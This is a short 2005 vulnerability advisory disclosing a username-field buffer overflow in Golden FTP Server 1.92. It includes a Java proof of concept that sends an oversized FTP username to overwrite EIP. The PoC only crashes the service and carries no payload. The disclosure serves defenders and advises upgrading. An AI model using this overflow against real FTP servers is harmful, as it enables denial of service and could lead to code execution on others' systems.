Golden Ftp Server Username Remote Buffer Overflow 

Date:03/01/2005

Version: Golden Ftp Server 1.92 

(Until 01/03/2005 it can be downloaded from
http://www.goldenftpserver.com/golden-ftp-server.zip
SHA-1 Hash of the ZIP file: 9F98D73C46E0F17EF31096F9441B9A9E8ED40CF3 
)

Vendor Description:

Golden FTP Server is extremely easy to use personal FTP server for  
Windows and can be run by any person who has the most basic computer skills.
http://www.goldenftpserver.com/



Flaw Description:

Golden FTP server suffers from a Buffer Overflow when more than 284
characters is entered in the Username field
at logon.

As EIP can be overwritten, it is possible to execute arbitrary code in
systems running this version of the daemon.


Proof of Concept:

I´m providing just a simple proof of concept for this flaw.

The Poc is also avaliable at www.debarry2.com.br/carlos

======begin code=======

/* Carlos Ulver at gmail.com
 * www.debarry2.com.br/carlos
 * 03/01/05 
 * Golden Ftp Server 1.29(Freeware Version) Username Remote Buffer Overflow
 * This is only a proof of Concept.
 * This Ftpd was running in windows xp sp1 Portuguese(Brazilian)
 * 
 */
import java.net.URL;
public class Pocgftpd {
  
  
  public static void main(String[] args) {
    String A = new String();
    
    for(int i=0;i<281;i++) A+='a';
    for (int i = 0; i < 4; i++) A+='b';

  try{
    //This 'a' for password means nothing...only to complete: user:pass@host
    URL u = new URL("ftp://"+A+":a@127.0.0.1");
    u.openStream();
    }catch(Exception E1){}
    
  }
}


======end   code=======

Correction: For correction, please get a newer version of the FTPD.

For more details and updates and flaws please visit:
http://www.debarry2.com.br/carlos



-- 
Carlos A. Ulver.
Home: www.debarry2.com.br/carlos
PGP: www.debarry2.com.br/carlos/contato.htm

Brasil - MG